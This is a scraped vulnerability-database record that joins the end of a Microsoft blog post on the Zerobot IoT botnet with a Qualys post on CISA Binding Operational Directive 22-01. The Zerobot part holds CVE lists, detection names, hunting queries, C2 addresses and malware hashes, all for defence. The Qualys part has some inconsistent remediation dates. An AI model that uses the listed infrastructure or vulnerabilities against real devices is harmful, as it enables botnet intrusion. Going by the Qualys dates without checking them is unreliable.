Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mssecure", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture3.png)\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture4.png)\n\n### Summary Dashboard High Level Structured by Vendor:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture5.png)\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture6.jpg)\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture7.jpg)\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild

Description

Related